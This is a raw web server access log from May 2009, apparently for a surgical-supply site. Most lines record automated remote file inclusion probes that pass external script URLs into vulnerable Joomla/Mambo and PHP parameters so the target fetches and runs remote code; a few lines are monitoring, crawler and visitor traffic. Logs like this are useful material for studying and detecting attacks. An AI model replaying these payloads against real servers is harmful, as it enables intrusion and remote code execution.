64.6.231.215 - - [30/May/2009:04:35:10 -0400] "GET /logs///////////////////////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.waisikkai.com//components/com_registration/test.txt??? HTTP/1.1" 200 3458 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.234.63.110 - - [30/May/2009:04:35:15 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:15 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:15 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:18 -0400] "GET /logs/access_log.Q109052300%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:18 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:18 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:34 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:34 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:34 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
193.138.206.192 - - [30/May/2009:04:35:39 -0400] "GET ////index.php?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
193.138.206.192 - - [30/May/2009:04:35:39 -0400] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:35:41 -0400] "GET /logs/access_log.Q109052200%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:41 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:41 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:41 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:35:49 -0400] "GET /logs/access_log.Q109051100%20%20/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:55 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:35:57 -0400] "GET /logs/access_log.Q108070700%20%20///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 295 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:04:36:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.234.63.110 - - [30/May/2009:04:36:32 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:32 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:32 -0400] "GET /logs/access_log.Q109052100///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:32 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:34 -0400] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:34 -0400] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.234.63.110 - - [30/May/2009:04:36:34 -0400] "GET /logs/access_log.Q109052300///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://business.cnu.ac.kr/~economics/file/bbs//skin/copyright? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:37:33 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:37:33 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:04:38:36 -0400] "GET ////index.php?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:04:39:06 -0400] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:40:53 -0400] "GET /phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:40:53 -0400] "GET /logs/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:40:53 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:11 -0400] "GET /page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:11 -0400] "GET /logs/page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:11 -0400] "GET /logs/access_log.Q109051100%20%20/page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:13 -0400] "GET /page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:13 -0400] "GET /logs/page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:41:13 -0400] "GET /logs/access_log.Q109051100%20%20/page.php?lang=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:04:41:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.18.148.82 - - [30/May/2009:04:42:48 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:04:46:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.108 - - [30/May/2009:04:47:01 -0400] "GET /logs/error_log.Q109020900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
193.138.206.192 - - [30/May/2009:04:47:06 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
193.138.206.192 - - [30/May/2009:04:47:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 3434 "-" "Mozilla/5.0"
72.18.148.82 - - [30/May/2009:04:47:22 -0400] "GET /logs/access_log.Q109051000/phphtml.php?htmlclass_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:04:47:53 -0400] "GET /logs/error_log.Q108051600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.159.43 - - [30/May/2009:04:48:09 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
77.221.159.43 - - [30/May/2009:04:48:09 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.221.159.43 - - [30/May/2009:04:48:09 -0400] "GET /logs/access_log.Q109050300%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
77.221.159.43 - - [30/May/2009:04:48:14 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:49:23 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:49:23 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:49:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:04:49:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.234.100.126 - - [30/May/2009:04:50:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 200 3434 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:50:35 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:50:35 -0400] "GET /logs/access_log.Q109050300%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:50:35 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:50:44 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [30/May/2009:04:51:00 -0400] "GET /logs/access_log.Q109021500///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:51:09 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:51:10 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:51:14 -0400] "GET /logs/access_log.Q109050300%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:51:15 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:04:51:27 -0400] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:04:51:27 -0400] "GET //components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:04:51:27 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [30/May/2009:04:51:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.10.128.219 - - [30/May/2009:04:51:59 -0400] "GET /logs/access_log.Q108112300%20%20//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:52:03 -0400] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:52:03 -0400] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:52:04 -0400] "GET /logs/access_log.Q109050300%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [30/May/2009:04:52:09 -0400] "GET /logs/access_log.Q109051000%20%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://spy.nab.su/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:04:52:59 -0400] "GET /logs/access_log.Q109051500//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
85.10.128.219 - - [30/May/2009:04:53:16 -0400] "GET /logs/access_log.Q108112300//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:53:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:53:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:53:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:53:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
205.209.142.43 - - [30/May/2009:04:55:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Java/1.6.0_13"
209.59.12.99 - - [30/May/2009:04:56:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
221.139.104.104 - - [30/May/2009:04:56:51 -0400] "GET /logs/access_log.Q109021500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:56:56 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:56:59 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:56:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.36.213.166 - - [30/May/2009:04:57:13 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:57:14 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:14 -0400] "GET /logs/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:14 -0400] "GET /logs/access_log.Q109052300/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:14 -0400] "GET /lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:57:14 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:57:16 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
77.79.246.241 - - [30/May/2009:04:57:16 -0400] "GET /lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:16 -0400] "GET /logs/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:16 -0400] "GET /logs/access_log.Q109052300/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:19 -0400] "GET /logs/access_log.Q109052100/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:57:21 -0400] "GET /logs/access_log.Q109052100/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:57:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:24 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.36.213.166 - - [30/May/2009:04:57:45 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:57:47 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:57:47 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
116.36.213.166 - - [30/May/2009:04:57:48 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:57:48 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
119.152.58.218 - - [30/May/2009:04:57:52 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
119.152.58.218 - - [30/May/2009:04:57:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
77.79.246.241 - - [30/May/2009:04:58:13 -0400] "GET /logs/access_log.Q109052300%20%20/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:58:21 -0400] "GET /logs/access_log.Q109052300%20%20/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:04:58:22 -0400] "GET /logs/access_log.Q109052100%20%20//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:04:58:29 -0400] "GET /logs/error_log.Q109022700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.79.246.241 - - [30/May/2009:04:58:33 -0400] "GET /logs/access_log.Q109052100%20%20/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
77.79.246.241 - - [30/May/2009:04:58:40 -0400] "GET /logs/access_log.Q109052100%20%20/lass/forumpollrenderer.php?bbPath[path]=http://tstk.org//ktmllite/images/upload/sh1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.6.8.108 - - [30/May/2009:04:59:45 -0400] "GET /logs/error_log.Q108052500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.36.213.166 - - [30/May/2009:05:00:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:00:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:00:08 -0400] "GET /logs/access_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
116.36.213.166 - - [30/May/2009:05:00:52 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
